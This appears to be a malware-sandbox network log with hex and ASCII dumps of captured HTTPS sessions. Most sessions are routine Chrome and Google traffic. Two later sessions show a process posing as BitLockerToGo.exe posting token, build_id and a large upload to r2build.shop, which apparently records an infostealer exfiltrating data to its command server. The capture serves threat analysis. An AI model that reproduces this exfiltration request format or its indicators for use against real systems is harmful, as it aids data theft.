                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC476INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                    Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 5f 2e
                                                                                                                                                                                                                                    Data Ascii: ue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 2e
                                                                                                                                                                                                                                    Data Ascii: nction(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a.
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e
                                                                                                                                                                                                                                    Data Ascii: or(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;this.
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                    Data Ascii: "unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototype
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72
                                                                                                                                                                                                                                    Data Ascii: ne)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72
                                                                                                                                                                                                                                    Data Ascii: idden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Err
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                    Data Ascii: is[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.prototyp
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78
                                                                                                                                                                                                                                    Data Ascii: ion(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.nex
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC1390INData Raw: 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 74 72
                                                                                                                                                                                                                                    Data Ascii: y.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("Str


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    12192.168.2.449763142.250.186.464437064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:46 UTC726OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                    Host: play.google.com
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Content-Length: 905
                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    2025-01-09 13:01:46 UTC905OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 36 34 32 37 37 30 33 36 31 39 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                    Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1736427703619",null,null,null,
                                                                                                                                                                                                                                    2025-01-09 13:01:46 UTC941INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                    Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                    Set-Cookie: NID=520=PdRdFR-cP5Jb2pvy6_b-wBOTrJW9BZsiVFbKnDNVtJ2w9yWKRz0MbdWfFAea191Udk-PfjjD_EBS45cGDIMG9MzKkTMIZBiQ_80jImH3EDlurBJzyjouP-cmuGOVjBBk3KjaGpHIi9PIyy4jcxhIIC0E9jfzCPtU__4mhC3DoyCeShmsO-fE0Jk; expires=Fri, 11-Jul-2025 13:01:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:46 GMT
                                                                                                                                                                                                                                    Server: Playlog
                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Expires: Thu, 09 Jan 2025 13:01:46 GMT
                                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    2025-01-09 13:01:46 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                    2025-01-09 13:01:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    13192.168.2.44976694.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:46 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----phdbsje37900zu37qimy
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 505
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:46 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 70 68 64 62 73 6a 65 33 37 39 30 30 7a 75 33 37 71 69 6d 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 70 68 64 62 73 6a 65 33 37 39 30 30 7a 75 33 37 71 69 6d 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 70 68 64 62 73 6a 65 33 37 39 30 30 7a 75 33 37 71 69 6d 79 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------phdbsje37900zu37qimyContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------phdbsje37900zu37qimyContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------phdbsje37900zu37qimyCont
                                                                                                                                                                                                                                    2025-01-09 13:01:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:47 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    14192.168.2.44976794.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----aieusr9zmglfuas2n7gd
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 213453
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 61 69 65 75 73 72 39 7a 6d 67 6c 66 75 61 73 32 6e 37 67 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 61 69 65 75 73 72 39 7a 6d 67 6c 66 75 61 73 32 6e 37 67 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 61 69 65 75 73 72 39 7a 6d 67 6c 66 75 61 73 32 6e 37 67 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------aieusr9zmglfuas2n7gdContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------aieusr9zmglfuas2n7gdContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------aieusr9zmglfuas2n7gdCont
                                                                                                                                                                                                                                    2025-01-09 13:01:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
